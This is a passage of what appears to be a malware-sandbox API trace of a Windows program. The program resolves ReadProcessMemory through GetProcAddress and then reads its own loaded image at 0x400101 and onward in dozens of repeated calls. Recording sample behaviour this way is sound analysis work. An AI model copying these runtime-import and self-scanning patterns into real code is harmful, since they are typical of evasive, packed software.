lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0318.169] GetTextExtentPoint32A (in: hdc=0x11010268, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0318.169] TabbedTextOutA (hdc=0x11010268, x=86, y=52, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0319.292] LoadLibraryA (lpLibFileName="KERNEL32 ") returned 0x759c0000 [0319.292] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.292] GetProcAddress (hModule=0x759c0000, lpProcName="ReadProcessMemory") returned 0x759ecfcc [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400101, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400102, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400103, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400104, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400105, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400106, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400107, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400108, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400109, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400110, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400111, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400112, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400113, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400114, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400115, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400116, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400117, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.293] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400118, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.293] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400119, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400120, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400121, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400122, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400123, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400124, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400125, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400126, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400127, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400128, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400129, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.294] GetLastError () returned 0x0 [0319.294] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400130, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400131, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400132, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400133, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400134, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400135, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400136, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400137, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400138, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400139, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400140, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400141, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400142, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400143, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400144, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400145, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400146, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.295] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400147, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.295] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400148, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400149, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400150, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400151, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400152, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400153, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400154, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400155, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400156, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400157, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400158, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400159, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.296] GetLastError () returned 0x0 [0319.296] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: 